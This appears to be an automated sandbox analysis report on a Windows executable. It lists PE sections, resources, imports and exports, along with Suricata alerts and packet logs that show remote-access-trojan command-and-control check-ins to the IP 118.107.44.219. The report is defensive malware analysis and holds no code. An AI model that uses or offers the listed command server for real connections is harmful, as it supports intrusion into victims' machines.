                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                            .text0x10000x2c20c80x2c22002022b8d5817cc1a013b6f7be724426beunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .itext0x2c40000x28980x2a0014817d9596460398ce8a10ec41885658False0.5013950892857143data6.097600196485659IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .data0x2c70000x92580x9400b6c68a9cc08d787f829bebe13beeebceFalse0.576198268581081data6.2228077637398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .bss0x2d10000x790c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .idata0x2d90000x39ba0x3a001c7fac207b7708f2d38f3eced48727dcFalse0.3355334051724138data5.289106478125697IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .didata0x2dd0000xbde0xc00022cbd8e7ebbfb3df44dfd43f92fa718False0.3512369791666667data4.391276161587863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .edata0x2de0000x970x20029372b5d9fa8b5b431a37756aee4c5b7False0.25data1.8458344781090077IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .tls0x2df0000x4c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .rdata0x2e00000x5d0x2000e147eb88402eb8a56f168b457309291False0.189453125data1.3507743158343073IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .rsrc0x2e10000x3ad000x3ae0032a06d163194b2d3bf155f7a452b4065False0.46382779325902335data6.14802530245256IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                            Resources

                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                            RT_CURSOR0x2e23200x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                            RT_CURSOR0x2e24540x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                                                                            RT_CURSOR0x2e25880x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                                                                            RT_CURSOR0x2e26bc0x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                                                                            RT_CURSOR0x2e27f00x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                                                                            RT_CURSOR0x2e29240x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                                                                            RT_CURSOR0x2e2a580x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                                                            RT_ICON0x2e2b8c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.04227680680207841
                                                                                                                                                                                                            RT_ICON0x2e6db40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.07157676348547717
                                                                                                                                                                                                            RT_ICON0x2e935c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.08794559099437148
                                                                                                                                                                                                            RT_ICON0x2ea4040x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.11891828058573453
                                                                                                                                                                                                            RT_ICON0x2ee62c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.1578838174273859
                                                                                                                                                                                                            RT_ICON0x2f0bd40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.010333018422295701
                                                                                                                                                                                                            RT_ICON0x2f4dfc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.026763485477178422
                                                                                                                                                                                                            RT_ICON0x2f73a40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.02626641651031895
                                                                                                                                                                                                            RT_ICON0x2f844c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.15806754221388367
                                                                                                                                                                                                            RT_ICON0x2f94f40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.27172131147540984
                                                                                                                                                                                                            RT_ICON0x2f9e7c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.350177304964539
                                                                                                                                                                                                            RT_ICON0x2fa2e40x217PNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0205607476635514
                                                                                                                                                                                                            RT_ICON0x2fa4fc0x2ffPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedEnglishUnited States1.014341590612777
                                                                                                                                                                                                            RT_ICON0x2fa7fc0x35cPNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0127906976744185
                                                                                                                                                                                                            RT_ICON0x2fab580x4caPNG image data, 28 x 28, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0089722675367048
                                                                                                                                                                                                            RT_ICON0x2fb0240x3faPNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108055009823183
                                                                                                                                                                                                            RT_ICON0x2fb4200x577PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0078627591136526
                                                                                                                                                                                                            RT_ICON0x2fb9980x5f8PNG image data, 48 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States1.007198952879581
                                                                                                                                                                                                            RT_ICON0x2fbf900x99cPNG image data, 56 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004471544715447
                                                                                                                                                                                                            RT_ICON0x2fc92c0xaf8PNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003917378917379
                                                                                                                                                                                                            RT_ICON0x2fd4240x75ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0058324496288442
                                                                                                                                                                                                            RT_ICON0x2fdb840xaf3PNG image data, 72 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039243667499107
                                                                                                                                                                                                            RT_ICON0x2fe6780xb2dPNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038448095071653
                                                                                                                                                                                                            RT_ICON0x2ff1a80xd9fPNG image data, 84 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003154574132492
                                                                                                                                                                                                            RT_ICON0x2fff480xdc6PNG image data, 96 x 96, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031196823596142
                                                                                                                                                                                                            RT_ICON0x300d100x12caPNG image data, 112 x 112, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0022869022869023
                                                                                                                                                                                                            RT_ICON0x301fdc0xd03PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033023116181328
                                                                                                                                                                                                            RT_ICON0x302ce00x152cPNG image data, 144 x 144, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002029520295203
                                                                                                                                                                                                            RT_ICON0x30420c0x16b5PNG image data, 160 x 160, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0006881128505074
                                                                                                                                                                                                            RT_ICON0x3058c40x1d96PNG image data, 168 x 168, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                            RT_ICON0x30765c0x1a2aPNG image data, 192 x 192, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9905942072260376
                                                                                                                                                                                                            RT_ICON0x3090880x2a22PNG image data, 216 x 216, 8-bit/color RGBA, non-interlacedEnglishUnited States0.998887446690154
                                                                                                                                                                                                            RT_ICON0x30baac0x2c53PNG image data, 240 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9956816779765577
                                                                                                                                                                                                            RT_ICON0x30e7000x191cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.972775357809583
                                                                                                                                                                                                            RT_STRING0x31001c0x210data0.3125
                                                                                                                                                                                                            RT_STRING0x31022c0x440data0.37683823529411764
                                                                                                                                                                                                            RT_STRING0x31066c0x2b4data0.45809248554913296
                                                                                                                                                                                                            RT_STRING0x3109200x214data0.4605263157894737
                                                                                                                                                                                                            RT_STRING0x310b340x3e4data0.3885542168674699
                                                                                                                                                                                                            RT_STRING0x310f180x3a0data0.4191810344827586
                                                                                                                                                                                                            RT_STRING0x3112b80x1ecdata0.5609756097560976
                                                                                                                                                                                                            RT_STRING0x3114a40xccdata0.6666666666666666
                                                                                                                                                                                                            RT_STRING0x3115700x294data0.4681818181818182
                                                                                                                                                                                                            RT_STRING0x3118040x3e8data0.372
                                                                                                                                                                                                            RT_STRING0x311bec0x488data0.41293103448275864
                                                                                                                                                                                                            RT_STRING0x3120740x418data0.28435114503816794
                                                                                                                                                                                                            RT_STRING0x31248c0x370data0.4147727272727273
                                                                                                                                                                                                            RT_STRING0x3127fc0x39cdata0.41233766233766234
                                                                                                                                                                                                            RT_STRING0x312b980x4a4data0.382996632996633
                                                                                                                                                                                                            RT_STRING0x31303c0x384data0.37333333333333335
                                                                                                                                                                                                            RT_STRING0x3133c00x454data0.3935018050541516
                                                                                                                                                                                                            RT_STRING0x3138140x210data0.39015151515151514
                                                                                                                                                                                                            RT_STRING0x313a240xbcdata0.6542553191489362
                                                                                                                                                                                                            RT_STRING0x313ae00x100data0.62890625
                                                                                                                                                                                                            RT_STRING0x313be00x338data0.4223300970873786
                                                                                                                                                                                                            RT_STRING0x313f180x3f0data0.34226190476190477
                                                                                                                                                                                                            RT_STRING0x3143080x314data0.38578680203045684
                                                                                                                                                                                                            RT_STRING0x31461c0x2f8data0.38026315789473686
                                                                                                                                                                                                            RT_RCDATA0x3149140x10data1.5
                                                                                                                                                                                                            RT_RCDATA0x3149240x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                                                                                                                            RT_RCDATA0x3161240xb70data0.5358606557377049
                                                                                                                                                                                                            RT_RCDATA0x316c940x147Delphi compiled form 'TMainForm'0.746177370030581
                                                                                                                                                                                                            RT_RCDATA0x316ddc0x480Delphi compiled form 'TNewDiskForm'0.5052083333333334
                                                                                                                                                                                                            RT_RCDATA0x31725c0x400Delphi compiled form 'TSelectFolderForm'0.5087890625
                                                                                                                                                                                                            RT_RCDATA0x31765c0x4b5Delphi compiled form 'TSelectLanguageForm'0.5004149377593361
                                                                                                                                                                                                            RT_RCDATA0x317b140x7e3Delphi compiled form 'TUninstallProgressForm'0.40713224368499257
                                                                                                                                                                                                            RT_RCDATA0x3182f80x55cDelphi compiled form 'TUninstSharedFileForm'0.41690962099125367
                                                                                                                                                                                                            RT_RCDATA0x3188540x2ac9Delphi compiled form 'TWizardForm'0.19811923673879303
                                                                                                                                                                                                            RT_GROUP_CURSOR0x31b3200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                            RT_GROUP_CURSOR0x31b3340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                            RT_GROUP_CURSOR0x31b3480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x31b35c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x31b3700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x31b3840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_CURSOR0x31b3980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                            RT_GROUP_ICON0x31b3ac0x148dataEnglishUnited States0.6524390243902439
                                                                                                                                                                                                            RT_GROUP_ICON0x31b4f40x30dataEnglishUnited States0.9375
                                                                                                                                                                                                            RT_GROUP_ICON0x31b5240x22dataEnglishUnited States1.0588235294117647
                                                                                                                                                                                                            RT_GROUP_ICON0x31b5480x30dataEnglishUnited States0.9375
                                                                                                                                                                                                            RT_GROUP_ICON0x31b5780x30dataEnglishUnited States0.9583333333333334
                                                                                                                                                                                                            RT_VERSION0x31b5a80x514dataEnglishUnited States0.3007692307692308
                                                                                                                                                                                                            RT_MANIFEST0x31babc0x244XML 1.0 document, ASCII text, with CRLF line terminatorsChineseChina0.453448275862069

                                                                                                                                                                                                            Imports

                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                            mpr.dllWNetEnumResourceW, WNetGetUniversalNameW, WNetGetConnectionW, WNetCloseEnum, WNetOpenEnumW
                                                                                                                                                                                                            comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                                                            comctl32.dllFlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_Draw, ImageList_Remove
                                                                                                                                                                                                            shell32.dllSHBrowseForFolderW, SHGetMalloc, SHGetFileInfoW, SHChangeNotify, Shell_NotifyIconW, ShellExecuteW, SHGetPathFromIDListW, ShellExecuteExW
                                                                                                                                                                                                            user32.dllCopyImage, CreateWindowExW, GetMenuItemInfoW, SetMenuItemInfoW, DefFrameProcW, GetDCEx, GetMessageW, PeekMessageW, MonitorFromWindow, GetDlgCtrlID, ScrollWindowEx, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, FrameRect, MapVirtualKeyW, OffsetRect, IsWindowUnicode, RegisterWindowMessageW, FillRect, GetMenuStringW, DispatchMessageW, SendMessageA, DefMDIChildProcW, EnumWindows, GetClassInfoW, GetSystemMenu, WaitForInputIdle, ShowOwnedPopups, GetScrollRange, GetScrollPos, SetScrollPos, GetActiveWindow, SetActiveWindow, DrawEdge, InflateRect, GetKeyboardLayoutList, OemToCharBuffA, LoadBitmapW, DrawFocusRect, EnumChildWindows, GetScrollBarInfo, SendNotifyMessageW, ReleaseCapture, UnhookWindowsHookEx, LoadCursorW, GetCapture, SetCapture, CreatePopupMenu, ScrollWindow, ShowCaret, GetMenuItemID, GetLastActivePopup, CharLowerBuffW, GetSystemMetrics, SetWindowLongW, PostMessageW, DrawMenuBar, SetParent, IsZoomed, CharUpperBuffW, GetClientRect, IsChild, ClientToScreen, SetWindowPlacement, IsIconic, CallNextHookEx, GetMonitorInfoW, ShowWindow, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, SetForegroundWindow, GetWindowTextW, EnableWindow, DestroyWindow, IsDialogMessageW, EndMenu, RegisterClassW, CharNextW, GetWindowThreadProcessId, RedrawWindow, GetDC, GetFocus, SetFocus, EndPaint, ExitWindowsEx, ReleaseDC, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, GetClassLongW, ActivateKeyboardLayout, GetParent, CharToOemBuffA, DrawTextW, SetScrollRange, InsertMenuItemW, PeekMessageA, GetPropW, SetClassLongW, MessageBoxW, MessageBeep, SetPropW, SetRectEmpty, UpdateWindow, RemovePropW, GetSubMenu, MsgWaitForMultipleObjects, DestroyMenu, DestroyIcon, SetWindowsHookExW, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, AdjustWindowRectEx, DrawIcon, IsWindow, EnumThreadWindows, InvalidateRect, GetKeyboardState, DrawFrameControl, ScreenToClient, SendMessageTimeoutW, BringWindowToTop, SetCursor, CreateIcon, CreateMenu, LoadStringW, CharLowerW, SetWindowPos, SetWindowRgn, GetMenuItemCount, RemoveMenu, AppendMenuW, GetSysColorBrush, GetKeyboardLayoutNameW, GetWindowDC, TranslateMessage, DrawTextExW, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, DestroyCursor, ReplyMessage, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, EnableScrollBar, GetSysColor, TrackPopupMenu, DrawIconEx, PostQuitMessage, GetClassNameW, ShowScrollBar, EnableMenuItem, GetIconInfo, GetMessagePos, LoadImageW, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, GetCursorPos, SetCursorPos, HideCaret, GetMenu, GetMenuState, SetMenu, SetRect, GetKeyState, FindWindowExW, MonitorFromPoint, SystemParametersInfoW, LoadIconW, GetCursor, GetWindow, GetWindowLongW, GetWindowRect, InsertMenuW, KillTimer, WaitMessage, IsWindowEnabled, IsDialogMessageA, TranslateMDISysAccel, GetWindowPlacement, FindWindowW, DeleteMenu, GetKeyboardLayout
                                                                                                                                                                                                            version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                                                                                                                                            oleaut32.dllSafeArrayPutElement, LoadTypeLib, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, SafeArrayCreate, SafeArrayGetElement, GetActiveObject, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, RegisterTypeLib, VariantChangeType, VariantCopyInd
                                                                                                                                                                                                            advapi32.dllRegSetValueExW, ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, GetUserNameW, RegQueryInfoKeyW, EqualSid, GetTokenInformation, RegCreateKeyExW, SetSecurityDescriptorDacl, RegEnumKeyExW, AdjustTokenPrivileges, RegDeleteKeyW, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, RegDeleteValueW, RegFlushKey, RegEnumValueW, RegQueryValueExW, ConvertSidToStringSidW, RegCloseKey, InitializeSecurityDescriptor
                                                                                                                                                                                                            netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                                                                                                                                                                            msvcrt.dllmemcpy
                                                                                                                                                                                                            winhttp.dllWinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
                                                                                                                                                                                                            kernel32.dllSetFileAttributesW, SetFileTime, GetACP, GetExitCodeProcess, IsBadWritePtr, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, HeapAlloc, ExitProcess, WriteProfileStringW, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, HeapDestroy, CompareFileTime, ReadFile, CreateProcessW, TransactNamedPipe, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, OpenMutexW, CreateThread, CompareStringW, CopyFileW, CreateMutexW, LoadLibraryA, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, MoveFileW, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, OpenProcess, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetLogicalDrives, LocalFileTimeToFileTime, SetNamedPipeHandleState, LoadLibraryExW, TerminateProcess, LockResource, FileTimeToSystemTime, GetShortPathNameW, GetCurrentThreadId, UnhandledExceptionFilter, MoveFileExW, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, ReleaseMutex, FlushFileBuffers, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, GetCurrentProcess, SetThreadPriority, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, DeviceIoControl, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateNamedPipeW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetOverlappedResult, GetSystemDefaultUILanguage, EnumCalendarInfoW, GetProfileStringW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, IsDBCSLeadByte, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
                                                                                                                                                                                                            ole32.dllStgCreateDocfileOnILockBytes, CoCreateInstance, CLSIDFromString, CoUninitialize, IsEqualGUID, OleInitialize, CoFreeUnusedLibraries, CreateILockBytesOnHGlobal, CLSIDFromProgID, OleUninitialize, CoDisconnectObject, CoInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID
                                                                                                                                                                                                            gdi32.dllArc, Pie, SetBkMode, SelectPalette, CreateCompatibleBitmap, ExcludeClipRect, RectVisible, SetWindowOrgEx, MaskBlt, AngleArc, Chord, SetTextColor, StretchBlt, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, RemoveFontResourceW, GetWindowOrgEx, CreatePalette, CreateBrushIndirect, PatBlt, LineDDA, PolyBezierTo, GetStockObject, CreateSolidBrush, Polygon, Rectangle, MoveToEx, DeleteDC, SaveDC, BitBlt, Ellipse, FrameRgn, GetDeviceCaps, GetBitmapBits, GetTextExtentPoint32W, GetClipBox, Polyline, IntersectClipRect, GetSystemPaletteEntries, CreateBitmap, AddFontResourceW, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, CreatePenIndirect, SetStretchBltMode, GetDIBits, CreateFontIndirectW, PolyBezier, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, DeleteObject, SelectObject, ExtFloodFill, UnrealizeObject, SetBkColor, CreateCompatibleDC, GetObjectW, GetBrushOrgEx, GetCurrentPositionEx, SetROP2, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, ArcTo, GdiFlush, SetPixel, EnumFontFamiliesExW, GetPaletteEntries

                                                                                                                                                                                                            Exports

                                                                                                                                                                                                            NameOrdinalAddress
                                                                                                                                                                                                            TMethodImplementationIntercept30x4b5e78
                                                                                                                                                                                                            __dbk_fcall_wrapper20x410a7c
                                                                                                                                                                                                            dbkFCallWrapperAddr10x6d4640

                                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                            EnglishUnited States
                                                                                                                                                                                                            ChineseChina

                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                            2024-12-29T09:02:09.456478+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449738118.107.44.21919091TCP
                                                                                                                                                                                                            2024-12-29T09:03:19.528655+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449744118.107.44.21919091TCP
                                                                                                                                                                                                            2024-12-29T09:04:30.575700+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449891118.107.44.21919092TCP
                                                                                                                                                                                                            2024-12-29T09:05:42.606786+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.450026118.107.44.21919091TCP

                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Dec 29, 2024 09:01:55.013520002 CET497338853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:55.133554935 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:55.133677006 CET497338853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.483608961 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.483627081 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.483633041 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.483644009 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.483649969 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.483654976 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.483660936 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.483762026 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.483773947 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.483783960 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.483851910 CET497338853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.483881950 CET497338853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.603580952 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.603598118 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.603646994 CET497338853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.693953037 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.694050074 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.694118023 CET497338853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.698016882 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.698070049 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.698122025 CET497338853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.706341028 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.706424952 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.706473112 CET497338853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.714701891 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.714802980 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.714843988 CET497338853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.723099947 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.723231077 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.723273039 CET497338853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.731487989 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.731595993 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.731645107 CET497338853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.739864111 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.739958048 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.740006924 CET497338853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.748315096 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.748411894 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.748456001 CET497338853192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.756685019 CET885349733118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:01:56.756807089 CET885349733118.107.44.219192.168.2.4
